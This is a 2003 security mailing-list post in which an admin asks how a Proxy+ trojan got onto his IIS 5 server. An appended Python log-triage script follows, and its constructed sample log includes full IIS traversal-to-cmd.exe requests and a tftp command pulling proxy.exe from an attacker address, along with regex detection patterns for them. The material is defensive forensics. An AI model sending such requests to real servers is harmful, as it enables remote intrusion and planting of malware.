Security Basics mailing list archives

Re: Proxy+ Trojan


From: "Bill" <proftpd () anatek com>
Date: Mon, 3 Feb 2003 18:57:45 -0600

Hamish,

Sorry, I should have provided a better description to begin with.

> The simple answer is find out how it was put on there, and block off that

That's the problem -- it's not so simple.  This is a dedicated web server
(Win2K/IIS5) that I have co-located in a top-tier data center.  The app was
installed remotely, and no logins were compromised.  I had just finished
having my SQL Server hardened (about 10 days _before_ Slammer!) and we ran
some extensive password cracking software then.  I was feeling pretty ok,
and then I started getting SpamCop reports.  I checked for an open relay a
hundred times, but couldn't find anything.  After a couple of days I found
the copy of Proxy+ and blew it away.  I then installed a software firewall,
and I'm ok now (except for learning how to configure the firewall :-) ).

The real problem is that I don't know how this install was done.  I would
really like to address this as an independent issue.  I must have something
configured horribly wrong, but how do I start the detective work?  And now,
everything seems suspicious.  I feel the urge to disable every service!  :-)

Anyhow, if you have ideas on how an app could get installed remotely, I
could start investigating.

> Then do a security audit on that machine.

I have subscribed to the SecurityMetrics offering, which I think will
definitely help on an ongoing basis.  But my situation is not ideal.  I'm
misconfigured, I'm sure, but handling it with a firewall.  I want to be
correctly configured and have the firewall as an extra measure of safety.

I would enjoy hearing your speculation!

Thanks!

Bill
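One place to start the detective work Bill asks about is the IIS log. The script below is an added example for this thread, not code from the original post or from any tool mentioned in it. It parses the W3C extended format that IIS 5 writes (reading the field list from the log's own #Fields directive rather than assuming it) and flags requests carrying the indicators that, in that era, most often preceded a file being dropped onto an IIS 4/5 box: an encoded directory traversal reaching cmd.exe, a query that invokes tftp or ftp to fetch a file, and an executable being requested from under the web root. The log lines are constructed for the example and do not come from Bill's server; the attacker addresses are documentation ranges.

```python
"""Triage IIS 5 W3C extended log lines for signs of remote command execution.

Added example, not code from the original post. SAMPLE_LOG is constructed;
its "bad" lines model the classic traversal -> cmd.exe -> tftp chain and a
follow-up request for the dropped binary. Assumes the default IIS 5 W3C
fields; the #Fields line on a real server may differ, so it is parsed.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-01-28 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-01-28 03:14:07 192.0.2.10 GET /default.htm - 200 Mozilla/4.0
2003-01-28 03:15:22 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200 -
2003-01-28 03:15:40 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+198.51.100.7+GET+proxy.exe+c:\\inetpub\\scripts\\proxy.exe 200 -
2003-01-28 03:16:02 198.51.100.7 GET /scripts/proxy.exe - 200 -
2003-01-28 04:01:11 203.0.113.5 GET /msadc/..%255c../winnt/system32/cmd.exe /c+dir 404 -
"""

# Traversal forms used against IIS 4/5: plain, overlong UTF-8 (%c0%af, %c1%9c)
# and double-encoded (%255c, %252f). Matched against the RAW stem on purpose.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%c0%af|%c1%9c|%25(5c|2f)|%2e%2e", re.I)
# File-transfer tools invoked through cmd.exe to pull a payload onto the host.
TRANSFER_RE = re.compile(r"\b(tftp|ftp)(\.exe)?\b", re.I)


def parse_iis_log(text):
    """Return one dict per data line, keyed by the names in #Fields."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            # Keep malformed lines visible instead of silently dropping them.
            records.append({"_raw": line, "_malformed": True})
            continue
        records.append(dict(zip(fields, parts)))
    return records


def decode_uri(s):
    # Two passes so a double-encoded %255c surfaces as a backslash.
    return unquote(unquote(s.replace("+", " ")))


def find_indicators(rec):
    """List the indicator names that apply to one log record."""
    stem = rec.get("cs-uri-stem", "")
    d_stem = decode_uri(stem).lower()
    d_query = decode_uri(rec.get("cs-uri-query", "")).lower()
    ind = []
    if TRAVERSAL_RE.search(stem) or "../" in d_stem or "..\\" in d_stem:
        ind.append("traversal")
    if "cmd.exe" in d_stem:
        ind.append("cmd.exe")
    if TRANSFER_RE.search(d_query):
        ind.append("file-transfer")
    # An .exe served from the web root that is not cmd.exe: a dropped tool.
    if d_stem.endswith(".exe") and "cmd.exe" not in d_stem:
        ind.append("exe-under-webroot")
    return ind


def triage(text):
    """Return the flagged requests; status 200 marks the ones that worked."""
    hits = []
    for rec in parse_iis_log(text):
        if rec.get("_malformed"):
            continue
        ind = find_indicators(rec)
        if ind:
            hits.append({
                "time": f"{rec['date']} {rec['time']}",
                "ip": rec["c-ip"],
                "status": rec["sc-status"],
                "succeeded": rec["sc-status"] == "200",
                "indicators": ind,
                "request": f"{rec['cs-method']} {rec['cs-uri-stem']} {rec['cs-uri-query']}",
            })
    return hits


def suspect_ips(hits):
    """Count flagged requests per client address to see who to pivot on."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        flag = "SUCCEEDED" if h["succeeded"] else "attempt"
        print(f"{h['time']} {h['ip']} {h['status']} {flag:9} "
              f"{','.join(h['indicators'])}  {h['request']}")
    print(suspect_ips(found))
```

On an IIS 5 host the logs normally sit under %SystemRoot%\system32\LogFiles\W3SVC1\ (one exYYMMDD.log per day); point the script at the files covering the days before the first SpamCop report and work backwards. A traversal request that returned 200 is the thing to chase: the same client address, the timestamp against the creation time of the Proxy+ files, and whatever the query on that request fetched. A 404 on the same pattern is a scan that did not land, which is still worth noting but is not the intrusion.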


